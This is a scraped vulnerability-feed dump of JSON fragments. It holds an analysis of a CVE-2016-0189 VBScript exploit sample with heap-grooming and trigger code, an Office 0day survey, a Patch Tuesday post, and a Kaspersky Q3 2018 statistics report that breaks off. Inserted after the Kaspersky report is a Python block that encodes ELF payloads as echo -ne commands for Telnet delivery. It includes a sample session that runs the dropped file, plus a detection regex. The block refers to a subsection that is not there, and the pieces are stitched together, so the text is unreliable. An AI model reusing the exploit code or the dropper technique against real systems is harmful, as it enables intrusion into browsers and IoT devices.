My preliminary analysis suggested that this is the original attack file for CVE-2016-0189 from that year. Its obfuscation is identical to that later seen in CVE-2017-0149, CVE-2018-8174 and CVE-2018-8373, and its exploitation and shellcode-loading techniques are the same as in those later exploits. \nI had other things on my hands at the time and did not study the sample carefully. A few days ago I dug the sample out again and spent a good deal of time debugging it. \nIn this article I describe how the CVE-2016-0189 sample works; as the reader will see, the array \u201cdislocation\u201d technique it uses is almost the same as that in CVE-2014-6332, CVE-2017-0149, CVE-2018-8174 and CVE-2018-8373. \nThe CVE-2016-0189 samples seen publicly before this are essentially based on the published code for the vulnerability, whose details I analysed in an earlier article. \nBelow we take a look at the technique used by the real CVE-2016-0189 0day sample from three years ago. \n\nMemory layout \nThe exploit enters its main function through the following code: \ndocument.write(\"var obj = {}; obj.toString = function() { my_valueof(); return 0;}; StartExploit(obj);\" & Unescape(\"%3c/script%3e\")) \nIn the StartExploit function, the prepare function is called first to lay out memory. Each arr2(i) = Null releases the memory of one tagSAFEARRAY structure. \nReDim arr(0, 0) \narr(0, 0) = 3 ' important: after the dislocation, the value 3 will be read as the type tag vbLong \n... \n\nSub prepare \n    Dim arr5() \n    ReDim arr5(2) \n    For i = 0 To 17 \n        arr3(i) = arr5 \n    Next \n    For i = 0 To &h7000 \n        arr1(i) = arr \n    Next \n    For i = 0 To 1999 \n        arr2(i) = arr ' initialise every element of arr2 to an array \n    Next \n    For i = 1000 To 100 Step -3 \n        arr2(i)(0, 0) = 0 \n        arr2(i) = Null ' release one third of the elements between arr2(100) and arr2(1000) \n    Next \n    ReDim arr4(0, &hFFF) ' define arr4 \nEnd Sub \nFunction StartExploit(js_obj) \n    ' unrelated code omitted \n    prepare \n    arr4(js_obj, 6) = &h55555555 \n    For i = 0 To 1999 \n        If IsArray(arr2(i)) = True Then \n            If UBound(arr2(i), 1) > 0 Then \n                vul_index = i \n                Exit For \n            End If \n        End If \n    Next \n    lb_index = LBound(arr2(i), 1) \n    If prepare_rw_mem() = True Then \n    Else \n        Exit Function \n    End If \n    addr = leak_addr() \n    ' subsequent code omitted \nEnd Function \nEach tagSAFEARRAY occupies 0x30 bytes of heap memory, the last 0x20 of which hold the tagSAFEARRAY structure itself: \n0:015> !heap -p -a 052a9fb0 \n    address 052a9fb0 found in \n    _HEAP @ 360000 \n      HEAP_ENTRY Size Prev Flags    UserPtr UserSize - state \n        052a9f98 0007 0000  [00]   052a9fa0    00030 - (busy) \n0:015> dd 052a9fa0 L30/4 \n052a9fa0  00000000 00000000 00000000 0000000c \n052a9fb0  08800002 00000010 00000000 0529d640 \n052a9fc0  00000001 00000000 00000001 00000000 \n0:015> dt ole32!tagSAFEARRAY 052a9fb0 \n   +0x000 cDims            : 2 \n   +0x002 fFeatures        : 0x880 \n   +0x004 cbElements       : 0x10 \n   +0x008 cLocks           : 0 \n   +0x00c pvData           : 0x0529d640 \n   +0x010 rgsabound        : [1] tagSAFEARRAYBOUND \nThe whole release process leaves roughly 300 holes of size 0x30 in memory. \n\nTriggering the vulnerability \nWith the memory layout in place, the exploit's statement arr4(js_obj, 6) = &h55555555 enters the custom my_valueof callback, which redefines arr4. As a result the memory at arr4's original pvData is released and new memory of the required size is requested. 
\nSub my_valueof() \n    ReDim arr4(2, 0) \nEnd Sub \nThis statement requests a 0x30-byte block for the pvData of arr4(2, 0); given the heap layout just prepared, the request reuses one of the freshly released tagSAFEARRAY blocks. \nLet us look more closely at how arr4(js_obj, 6) = &h55555555 is executed. \nThe cause of CVE-2016-0189 is that when AccessArray encounters a JavaScript object as an index, it invokes the overridden callback, here my_valueof. The exploit code in my_valueof redefines arr4 as arr4(2, 0). When the callback returns to AccessArray, the tagSAFEARRAY structure and pvData pointer of arr4 have already been changed, yet AccessArray continues to calculate the element address as if the access were still arr4(0, 6), and stores the calculated address in a stack variable. \n\n\n**[1] [[2]](<94507_2.htm>) [[3]](<94507_3.htm>) [[4]](<94507_4.htm>) [next](<94507_2.htm>)**\n", "edition": 1, "modified": "2019-06-13T00:00:00", "published": "2019-06-13T00:00:00", "id": "MYHACK58:62201994507", "href": "http://www.myhack58.com/Article/html/3/62/2019/94507.htm", "title": "For a suspected CVE-2016-0189 the original attack sample debugging-vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-13T15:28:22", "bulletinFamily": "info", "cvelist": ["CVE-2015-2545", "CVE-2012-1856", "CVE-2012-1535", "CVE-2017-11292", "CVE-2018-8174", "CVE-2018-4878", "CVE-2011-0609", "CVE-2017-11882", "CVE-2018-0802", "CVE-2016-7855", "CVE-2017-8570", "CVE-2016-4117", "CVE-2012-0158", "CVE-2015-1642", "CVE-2010-3333", "CVE-2013-0634", "CVE-2015-5119", "CVE-2013-3906", "CVE-2014-4114", "CVE-2016-7193", "CVE-2018-15982", "CVE-2015-2424", "CVE-2018-8373", "CVE-2011-0611", "CVE-2015-5122", "CVE-2017-0199", "CVE-2015-0097", "CVE-2018-5002", "CVE-2018-0798", 
"CVE-2014-1761", "CVE-2014-6352", "CVE-2017-8759", "CVE-2015-1641", "CVE-2015-7645", "CVE-2017-11826", "CVE-2017-0262", "CVE-2012-0779", "CVE-2017-0261"], "description": "This article is an extended summary of my talk at BlueHat Shanghai 2019. In it I survey the Office-related 0day/1day vulnerabilities of 2010 to 2018, go through each class of vulnerability in turn, and collect and categorise the analysis articles written about each one. \nI hope it is useful to those who go on to do Office vulnerability research. \n\nOverview \nFrom 2010 to 2018, Office 0day/1day attacks have never stopped. The CVEs below are the ones I observed during my research for which real attack samples existed (there may be omissions, which readers are welcome to add). \nFirst, the specific CVE numbers: \n\n| Year | CVE |\n| --- | --- |\n| 2010 | CVE-2010-3333 |\n| 2011 | CVE-2011-0609, CVE-2011-0611 |\n| 2012 | CVE-2012-0158, CVE-2012-0779, CVE-2012-1535, CVE-2012-1856 |\n| 2013 | CVE-2013-0634, CVE-2013-3906 |\n| 2014 | CVE-2014-1761, CVE-2014-4114, CVE-2014-6352 |\n| 2015 | CVE-2015-0097, CVE-2015-1641, CVE-2015-1642, CVE-2015-2424, CVE-2015-2545, CVE-2015-5119, CVE-2015-5122, CVE-2015-7645 |\n| 2016 | CVE-2016-4117, CVE-2016-7193, CVE-2016-7855 |\n| 2017 | CVE-2017-0199, CVE-2017-0261, CVE-2017-0262, CVE-2017-8570, CVE-2017-8759, CVE-2017-11826, CVE-2017-11882, CVE-2017-11292 |\n| 2018 | CVE-2018-0798, CVE-2018-0802, CVE-2018-4878, CVE-2018-5002, CVE-2018-8174, CVE-2018-8373, CVE-2018-15982 |\n\nNext, the vulnerabilities classified by the component involved. Note that Flash is itself an ActiveX control; in the table below I nonetheless treat Office-embedded Flash as a class of its own. 
\n| Component | CVE |\n| --- | --- |\n| RTF control word parsing | CVE-2010-3333, CVE-2014-1761, CVE-2016-7193 |\n| Open XML tag parsing | CVE-2015-1641, CVE-2017-11826 |\n| ActiveX control parsing | CVE-2012-0158, CVE-2012-1856, CVE-2015-1642, CVE-2015-2424, CVE-2017-11882, CVE-2018-0798, CVE-2018-0802 |\n| Office-embedded Flash | CVE-2011-0609, CVE-2011-0611, CVE-2012-0779, CVE-2012-1535, CVE-2013-0634, CVE-2015-5119, CVE-2015-5122, CVE-2015-7645, CVE-2016-4117, CVE-2016-7855, CVE-2017-11292, CVE-2018-4878, CVE-2018-5002, CVE-2018-15982 |\n| Office TIFF image parsing | CVE-2013-3906 |\n| Office EPS file parsing | CVE-2015-2545, CVE-2017-0261, CVE-2017-0262 |\n| Loading via Moniker | CVE-2017-0199, CVE-2017-8570, CVE-2017-8759, CVE-2018-8174, CVE-2018-8373 |\n| Other Office logic flaws | CVE-2014-4114, CVE-2014-6352, CVE-2015-0097 |\n\nNext, the non-Flash vulnerabilities above classified by vulnerability type (for a summary of the Flash vulnerabilities, see other researchers' articles): \n\n| Vulnerability type | CVE |\n| --- | --- |\n| Stack overflow | CVE-2010-3333, CVE-2012-0158, CVE-2017-11882, CVE-2018-0798, CVE-2018-0802 |\n| Heap out-of-bounds write | CVE-2014-1761, CVE-2016-7193 |\n| Type confusion | CVE-2015-1641, CVE-2017-11826, CVE-2017-0262 |\n| Use after free | CVE-2012-1856, CVE-2015-1642, CVE-2015-2424, CVE-2015-2545, CVE-2017-0261, CVE-2018-8174, CVE-2018-8373 |\n| Integer overflow | CVE-2013-3906 |\n| Logic vulnerability | CVE-2014-4114, CVE-2014-6352, CVE-2015-0097, CVE-2017-0199, CVE-2017-8570, CVE-2017-8759 |\n\nNow let us go through these vulnerabilities one by one, following the component table above and leaving the Flash vulnerabilities aside. \n\nRTF control word parsing \nCVE-2010-3333 \nThis vulnerability was found by wushi, head of Keen Security Lab. It is a stack overflow. 
\nThere are many analyses of this bug on the Pediy (kanxue) forum; here are a few. \nCVE-2010-3333 vulnerability analysis (in-depth analysis) \nMS10-087: from vulnerability to patch to PoC \nChapter 2, Section 4 of the book Vulnerability Warfare also gives a fairly systematic description of this bug; interested readers can read the relevant chapter. \nCVE-2014-1761 \nThis vulnerability was a 0day found by Google. It is a heap out-of-bounds write. \nHaifei Li wrote an excellent analysis of it: \nA Close Look at RTF Zero-Day Attack CVE-2014-1761 Shows Sophistication of Attackers \nThe Pediy forum also has two high-quality analyses of this bug: \nCVE-2014-1761 analysis notes \nMS14-017 (CVE-2014-1761) study notes, which also explain how to set up the right environment \nAnquanke has a high-quality analysis as well: \nBuilding Office exploits step by step (part 3) \nIn addition, AhnLab of South Korea published a report on this vulnerability: \nAnalysis of Zero-Day Exploit_Issue 01 Microsoft Word RTF Vulnerability CVE-2014-1761 \nWhen debugging this bug, note that some samples have rather strict trigger conditions; the articles above explain how to build a suitable test environment. \nCVE-2016-7193 \nThis vulnerability was a 0day reported to Microsoft by the Austrian Military Cyber Emergency Readiness Team. \nIt is also a heap out-of-bounds write. \nBaidu Security Lab published a fairly complete analysis: \nAPT attack weapon: the Word vulnerability CVE-2016-7193 explained \nI have also written an analysis of how to exploit this vulnerability: 
\nBuilding a calc-popping CVE-2016-7193 exploit from an in-the-wild sample \n\nOpen XML tag parsing \nCVE-2015-1641 \nGoogle's 0day tracking spreadsheet lists this as one of the 2015 0days. \nIt is a type confusion vulnerability. \nFortinet wrote an analysis of it: \nThe Curious Case Of The Document Exploiting An Unknown Vulnerability \u2013 Part 1 \nAlibaba Security also wrote an excellent analysis: \nAnalysis of the Word type confusion vulnerability CVE-2015-1641 \nAnquanke has a good analysis as well: \nBuilding Office exploits step by step (part 4) \nKnownsec 404 Team also wrote a good analysis: \nAnalysis of a CVE-2015-1641 Word exploit sample \nI have also written an article on the principles behind this bug: \nHow to analyze Open XML tag parsing vulnerabilities \nWhen debugging Office samples that rely on heap spraying, be aware that a debugger tends to change the process heap layout, in particular through some of its heap option settings. If a sample does not trigger normally when launched directly under the debugger, try double-clicking the sample and then attaching the debugger to the running process. 
\n", "edition": 1, "modified": "2019-06-13T00:00:00", "published": "2019-06-13T00:00:00", "id": "MYHACK58:62201994516", "href": "http://www.myhack58.com/Article/html/3/62/2019/94516.htm", "title": "The macro perspective of the office vulnerability, 2010-2018-a vulnerability warning-the black bar safety net", "type": "myhack58", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2019-01-14T20:46:20", "bulletinFamily": "blog", "cvelist": ["CVE-2018-8273", "CVE-2018-8302", "CVE-2018-8345", "CVE-2018-8373"], "description": "In this month's Patch Tuesday release there are 63 vulnerabilities patched with 20 Criticals. Out of the criticals, over half are browser-related, with the rest including Windows, SQL, and Exchange. Active exploits have been detected against CVE-2018-8373, one of the scripting engine vulnerabilities.\n\n### Workstation Patches\n\nBrowser and Scripting Engine patches should be prioritized for workstation-type devices, meaning any system that is used for email or to access the internet via a browser. Microsoft has disclosed that [CVE-2018-8373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373>) has active exploits against Internet Explorer, making these patches a high priority. The PDF viewer, Windows Font Library, and GDI+ also have patches available that require a user to interact with a malicious site or file.\n\n### LNK Remote Code Execution\n\nA vulnerability ([CVE-2018-8345](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8345>)) exists in the processing of shortcuts. This patch should be prioritized for both workstations and servers, as the user does not need to click the file to exploit. 
Simply viewing a malicious LNK file can execute code as the logged-in user.\n\n### Microsoft Exchange\n\nA vulnerability ([CVE-2018-8302](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8302>)) was [discovered](<https://www.zerodayinitiative.com/blog/2018/8/14/voicemail-vandalism-getting-remote-code-execution-on-microsoft-exchange-server>) in Exchange that can result in code executing as System. Exploitation of this vulnerability requires access to mailbox account setup, and can not be exploited by non-privileged users.\n\n### Microsoft SQL 2016/2017\n\nMicrosoft SQL was also patched for a remote code execution vulnerability ([CVE-2018-8273](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8273>)). Exploiting this vulnerability does require the ability to execute SQL queries, but this could be accomplished by chaining an existing SQL injection vulnerability in a web application.\n\n### L1 Terminal Fault (Foreshadow)\n\nMicrosoft has released a [guidance document](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV180018>) on new speculative execution vulnerabilities in Intel processors, as well as a full [technical analysis](<https://blogs.technet.microsoft.com/srd/2018/08/10/analysis-and-mitigation-of-l1-terminal-fault-l1tf/>) including mitigation options. Patches have been released, but require registry configuration to enable all mitigations. 
Exploitation of this vulnerability can allow VM guests to retrieve data from other guests, as well as process-to-process, which is similar to Meltdown.\n\n### Adobe\n\nAdobe has also released patches covering [Flash](<https://helpx.adobe.com/security/products/flash-player/apsb18-25.html>), [Acrobat/Reader](<https://helpx.adobe.com/security/products/acrobat/apsb18-29.html>), [Experience Manager](<https://helpx.adobe.com/security/products/experience-manager/apsb18-26.html>), and [Creative Cloud](<https://helpx.adobe.com/security/products/creative-cloud/apsb18-20.html>). Two vulnerabilities in Acrobat and Reader have been marked as Critical. While Adobe ranks the Flash update as Important, Microsoft ranks it as Critical.", "modified": "2018-08-14T18:47:21", "published": "2018-08-14T18:47:21", "id": "QUALYSBLOG:86F4EEA0E7CEE93E9EA6A2FB3C2315F0", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2018/08/14/august-patch-tuesday-63-vulns-l1tf-exchange-sql-active-attacks-on-ie-flaw", "type": "qualysblog", "title": "August Patch Tuesday \u2013 63 Vulns, L1TF (Foreshadow), Exchange, SQL, Active Attacks on IE flaw", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "securelist": [{"lastseen": "2018-11-30T17:13:50", "bulletinFamily": "blog", "cvelist": ["CVE-2017-11882", "CVE-2018-0802", "CVE-2018-8373", "CVE-2018-8414", "CVE-2018-8440"], "description": "\n\n_These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data. 
_\n\n## Q3 figures\n\nAccording to Kaspersky Security Network:\n\n * Kaspersky Lab solutions blocked 947,027,517 attacks launched from online resources located in 203 countries.\n * 246,695,333 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 305,315 users.\n * Ransomware attacks were registered on the computers of 259,867 unique users.\n * Our File Anti-Virus logged 239,177,356 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 1,305,015 malicious installation packages\n * 55,101 installation packages for mobile banking Trojans\n * 13,075 installation packages for mobile ransomware Trojans.\n\n## Mobile threats\n\n### Q3 events\n\nPerhaps the biggest news of the reporting period was the [Trojan-Banker.AndroidOS.Asacub](<https://securelist.com/the-rise-of-mobile-banker-asacub/87591/>) epidemic. It peaked in September when more than 250,000 unique users were attacked \u2013 and that only includes statistics for those with Kaspersky Lab's mobile products installed on their devices.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09145748/it-threat-evolution-q3-2018-statistics_01.png>)\n\n_Number of users attacked by the mobile banker Asacub in 2017 and 2018_\n\nThe scale of the attack involving Asacub by far surpasses the largest attacks we have previously observed while monitoring mobile threats. The Trojan's versions have sequential version numbers, suggesting the attacks were launched by just one threat actor. It's impossible to count the total number of affected users, but it would need to be in the tens of thousands to make such a massive malicious campaign profitable. 
\n\n### Mobile threat statistics\n\nIn Q3 2018, Kaspersky Lab detected **1,305,015** malicious installation packages, which is 439,229 fewer packages than in the previous quarter.\n\n_Number of detected malicious installation packages, Q3 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150155/it-threat-evolution-q3-2018-statistics_02.png>)\n\n#### Distribution of detected mobile apps by type\n\nAmong all the threats detected in Q3 2018, the lion's share belonged to potentially unwanted RiskTool apps (52.05%); compared to the previous quarter, their share decreased by 3.3 percentage points (p.p.). Members of the RiskTool.AndroidOS.SMSreg family contributed most to this.\n\n_Distribution of newly detected mobile apps by type, Q2 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/12081111/it-threat-evolution-q3-2018-statistics_03.png>)\n\nSecond place was occupied by Trojan-Dropper threats (22.57%), whose share increased by 9 p.p. 
Most files of this type belonged to the Trojan-Dropper.AndroidOS.Piom, Trojan-Dropper.AndroidOS.Wapnor and Trojan-Dropper.AndroidOS.Hqwar families.\n\nThe share of advertising apps continued to decrease and accounted for 6.44% of all detected threats (compared to 8.91% in Q2 2018).\n\nThe statistics show that the number of mobile financial threats has been rising throughout 2018, with the proportion of mobile banker Trojans increasing from 1.5% in Q1 to 4.38% of all detected threats in Q3.\n\n**TOP 20 mobile malware**\n\n| Verdicts* | %** \n---|---|--- \n1 | DangerousObject.Multi.Generic | 55.85 \n2 | Trojan.AndroidOS.Boogr.gsh | 11.39 \n3 | Trojan-Banker.AndroidOS.Asacub.a | 5.28 \n4 | Trojan-Banker.AndroidOS.Asacub.snt | 5.10 \n5 | Trojan.AndroidOS.Piom.toe | 3.23 \n6 | Trojan.AndroidOS.Dvmap.a | 3.12 \n7 | Trojan.AndroidOS.Triada.dl | 3.09 \n8 | Trojan-Dropper.AndroidOS.Tiny.d | 2.88 \n9 | Trojan-Dropper.AndroidOS.Lezok.p | 2.78 \n10 | Trojan.AndroidOS.Agent.rt | 2.74 \n11 | Trojan-Banker.AndroidOS.Asacub.ci | 2.62 \n12 | Trojan-Banker.AndroidOS.Asacub.cg | 2.51 \n13 | Trojan-Banker.AndroidOS.Asacub.ce | 2.29 \n14 | Trojan-Dropper.AndroidOS.Agent.ii | 1.77 \n15 | Trojan-Dropper.AndroidOS.Hqwar.bb | 1.75 \n16 | Trojan.AndroidOS.Agent.pac | 1.61 \n17 | Trojan-Dropper.AndroidOS.Hqwar.ba | 1.59 \n18 | Exploit.AndroidOS.Lotoor.be | 1.55 \n19 | Trojan.AndroidOS.Piom.uwp | 1.48 \n20 | Trojan.AndroidOS.Piom.udo | 1.36 \n \n_* This malware rating does not include potentially dangerous or unwanted programs such as RiskTool or adware._ \n_** Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._\n\nFirst place in our TOP 20 once again went to DangerousObject.Multi.Generic (55.85%), the verdict we use for malware that's detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). 
Cloud technologies work when antivirus databases do not yet contain the data to detect a malicious program but the company's cloud antivirus database already includes information about the object. This is basically how the very latest malicious programs are detected.\n\nIn second place was Trojan.AndroidOS.Boogr.gsh (11.39%). This verdict is given to files that our system recognizes as malicious based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird and fourth places went to representatives of the Asacub mobile banker family \u2013 Trojan-Banker.AndroidOS.Asacub.a (5.28%) and Trojan-Banker.AndroidOS.Asacub.snt (5.10%).\n\n#### Geography of mobile threats\n\n_Map of attempted infections using mobile malware, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151353/it-threat-evolution-q3-2018-statistics_04_en.png>)\n\n**TOP 10 countries by share of users attacked by mobile malware:**\n\n| Country* | %** \n---|---|--- \n1 | Bangladesh | 35.91 \n2 | Nigeria | 28.54 \n3 | Iran | 28.07 \n4 | Tanzania | 28.03 \n5 | China | 25.61 \n6 | India | 25.25 \n7 | Pakistan | 25.08 \n8 | Indonesia | 25.02 \n9 | Philippines | 23.07 \n10 | Algeria | 22.88 \n \n_* Countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000) are excluded._ \n_** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q3 2018, Bangladesh (35.91%) retained first place in terms of the share of mobile users attacked. Nigeria (28.54%) came second. Third and fourth places were claimed by Iran (28.07%) and Tanzania (28.03%) respectively.\n\n### Mobile banking Trojans\n\nDuring the reporting period, we detected **55,101** installation packages for mobile banking Trojans, which is nearly 6,000 fewer than in Q2 2018. 
\n\nThe largest contribution was made by Trojans belonging to the family Trojan-Banker.AndroidOS.Hqwar.jck \u2013 this verdict was given to 35% of all detected banking Trojans. Trojan-Banker.AndroidOS.Asacub came second, accounting for 29%.\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q3 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150645/it-threat-evolution-q3-2018-statistics_05.png>)\n\n| Verdicts | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.a | 33.27 \n2 | Trojan-Banker.AndroidOS.Asacub.snt | 32.16 \n3 | Trojan-Banker.AndroidOS.Asacub.ci | 16.51 \n4 | Trojan-Banker.AndroidOS.Asacub.cg | 15.84 \n5 | Trojan-Banker.AndroidOS.Asacub.ce | 14.46 \n6 | Trojan-Banker.AndroidOS.Asacub.cd | 6.66 \n7 | Trojan-Banker.AndroidOS.Svpeng.q | 3.25 \n8 | Trojan-Banker.AndroidOS.Asacub.cf | 2.07 \n9 | Trojan-Banker.AndroidOS.Asacub.bz | 1.68 \n10 | Trojan-Banker.AndroidOS.Asacub.bw | 1.68 \n \n_* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._\n\nIn Q3 2018, the TOP 10 rating of banking threats was almost exclusively (nine places out of 10) occupied by various versions of Trojan-Banker.AndroidOS.Asacub.\n\n_Geography of mobile banking threats, Q3 2018 _ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151425/it-threat-evolution-q3-2018-statistics_06_en.png>)\n\n**TOP 10 countries by share of users attacked by mobile banking Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | Russia | 2.18 \n2 | South Africa | 2.16 \n3 | Malaysia | 0.53 \n4 | Ukraine | 0.41 \n5 | Australia | 0.39 \n6 | China | 0.35 \n7 | South Korea | 0.33 \n8 | Tajikistan | 0.30 \n9 | USA | 0.27 \n10 | Poland | 0.25 \n| | \n \n_* Countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (under 10,000) are excluded._ \n_** 
Unique users in the country attacked by mobile banking Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q3 2018, Russia ended up in first place in this TOP 10 because of the mass attacks involving the Asacub Trojan. The USA, the previous quarter's leader, fell to ninth (0.27%) in Q3. Second and third place were occupied by South Africa (2.16%) and Malaysia (0.53%) respectively.\n\n### Mobile ransomware Trojans\n\nIn Q3 2018, we detected **13,075** installation packages for mobile ransomware Trojans, which is 1,044 fewer than in Q2.\n\n_Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab, Q3 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09150710/it-threat-evolution-q3-2018-statistics_07.png>)\n\n| Verdicts | %* \n---|---|--- \n1 | Trojan-Ransom.AndroidOS.Svpeng.ag | 47.79 \n2 | Trojan-Ransom.AndroidOS.Svpeng.ah | 26.55 \n3 | Trojan-Ransom.AndroidOS.Zebt.a | 6.71 \n4 | Trojan-Ransom.AndroidOS.Fusob.h | 6.23 \n5 | Trojan-Ransom.AndroidOS.Rkor.g | 5.50 \n6 | Trojan-Ransom.AndroidOS.Svpeng.snt | 3.38 \n7 | Trojan-Ransom.AndroidOS.Svpeng.ab | 2.15 \n8 | Trojan-Ransom.AndroidOS.Egat.d | 1.94 \n9 | Trojan-Ransom.AndroidOS.Small.as | 1.43 \n10 | Trojan-Ransom.AndroidOS.Small.cj | 1.23 \n \n_* Unique users attacked by the given malware as a percentage of all users of Kaspersky Lab's mobile antivirus attacked by ransomware Trojans._\n\nIn Q3 2018, the most widespread mobile ransomware Trojans belonged to the Svpeng family \u2013 Trojan-Ransom.AndroidOS.Svpeng.ag (47.79%) and Trojan-Ransom.AndroidOS.Svpeng.ah (26.55%). Together, they accounted for three quarters of all mobile ransomware Trojan attacks. 
The once-popular families Zebt and Fusob were a distant third and fourth, represented by Trojan-Ransom.AndroidOS.Zebt.a (6.71%) and Trojan-Ransom.AndroidOS.Fusob.h (6.23%) respectively.\n\n_Geography of mobile ransomware Trojans, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151458/it-threat-evolution-q3-2018-statistics_08_en.png>)\n\n**TOP 10 countries by share of users attacked by mobile ransomware Trojans:**\n\n| Country* | %** \n---|---|--- \n1 | USA | 1.73 \n2 | Kazakhstan | 0.36 \n3 | China | 0.14 \n4 | Italy | 0.12 \n5 | Iran | 0.11 \n6 | Belgium | 0.10 \n7 | Switzerland | 0.09 \n8 | Poland | 0.09 \n9 | Mexico | 0.09 \n10 | Romania | 0.08 \n \n_* Countries where the number of users of Kaspersky Lab's mobile antivirus is relatively small (under 10,000) are excluded._ \n_** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nJust like in Q2, first place in the TOP 10 went to the United States (1.73%). Kazakhstan (0.36%) rose one place to second in Q3, while China (0.14%) rose from seventh to third.\n\n## Attacks on IoT devices\n\nIn this quarter's report, we decided to only present the statistics for Telnet attacks, as this type of attack is used most frequently and employs the widest variety of malware types. 
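The Telnet attacks subsection below describes how Hajime drops NyaDrop through a Telnet shell with echo -ne, because the session offers command execution but no file transfer, and why that is workable for 480 bytes but not for 60 KB. As an added example, not Kaspersky's code and not NyaDrop's, the Python below reproduces the technique on a constructed 480-byte stand-in (only the 4-byte ELF magic is real), replays the commands the way a shell would to confirm the bytes arrive intact, counts the characters that have to be typed over the session, and flags a transcript line that writes an ELF header this way. The chunk size, the target path and the session transcript are assumptions made for the demo.

```python
import re

# Constructed stand-in for a NyaDrop-sized (480-byte) ELF: only the 4-byte
# magic is real, the rest is filler. These are not NyaDrop's actual bytes.
SAMPLE_ELF = b"\x7fELF" + bytes(range(256)) + bytes(220)


def echo_commands(payload: bytes, path: str = "/tmp/.n", chunk: int = 128) -> list:
    """Encode `payload` as `echo -ne` shell commands that rebuild it on the target.

    The first command truncates the file (>), the rest append (>>), so the only
    thing the attacker needs is a command channel such as a Telnet shell.
    """
    cmds = []
    for off in range(0, len(payload), chunk):
        esc = "".join(f"\\x{b:02x}" for b in payload[off:off + chunk])
        cmds.append(f'echo -ne "{esc}" {">" if off == 0 else ">>"} {path}')
    return cmds


_ECHO_CMD = re.compile(r'^echo -ne "((?:\\x[0-9a-fA-F]{2})*)" (>>?) (\S+)$')


def replay_echo_commands(cmds) -> dict:
    """Do what a shell would do with those commands: return {path: file bytes}."""
    files = {}
    for cmd in cmds:
        m = _ECHO_CMD.match(cmd)
        if not m:
            raise ValueError(f"not an echo -ne command: {cmd!r}")
        data = bytes.fromhex(m.group(1).replace("\\x", ""))
        path = m.group(3)
        files[path] = data if m.group(2) == ">" else files.get(path, b"") + data
    return files


def wire_chars(payload_len: int, chunk: int = 128, path: str = "/tmp/.n") -> int:
    """Characters typed over the session to deliver payload_len bytes (one newline per command)."""
    return sum(len(c) + 1 for c in echo_commands(bytes(payload_len), path, chunk))


# Detection side: an echo -ne whose first escaped bytes are the ELF magic is a
# binary being written through the shell, whatever name it gets on disk.
_ELF_VIA_ECHO = re.compile(r'echo\s+-ne\s+"\\x7f\\x45\\x4c\\x46', re.IGNORECASE)


def elf_written_via_echo(session_lines) -> list:
    """Return (line number, line) pairs of a session transcript that drop an ELF via echo."""
    return [(n, line) for n, line in enumerate(session_lines, 1) if _ELF_VIA_ECHO.search(line)]


# Constructed Telnet session transcript (not a real capture).
SESSION_LOG = [
    "enable",
    "sh",
    "cd /tmp || cd /var/run",
    'echo -ne "\\x7f\\x45\\x4c\\x46\\x01\\x01\\x01\\x00\\x00" > .n',
    'echo -ne "\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00" >> .n',
    "chmod +x .n; ./.n",
]

if __name__ == "__main__":
    cmds = echo_commands(SAMPLE_ELF)
    assert replay_echo_commands(cmds)["/tmp/.n"] == SAMPLE_ELF
    print(f"{len(cmds)} commands, 480 bytes -> {wire_chars(480)} chars typed")
    print(f"60 KB -> {wire_chars(60 * 1024)} chars typed")
    for n, line in elf_written_via_echo(SESSION_LOG):
        print(f"line {n}: ELF written via echo: {line}")
```

Every payload byte costs four characters on the wire plus per-command overhead, so the 480-byte dropper is about 2 KB of typing while 60 KB of Hajime is roughly a quarter of a megabyte pushed through an interactive session one line at a time; that asymmetry is the whole reason for the two-stage flow. On the defensive side, the same regex applied to honeypot or Telnet-proxy transcripts catches the dropper stage regardless of which family follows it.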
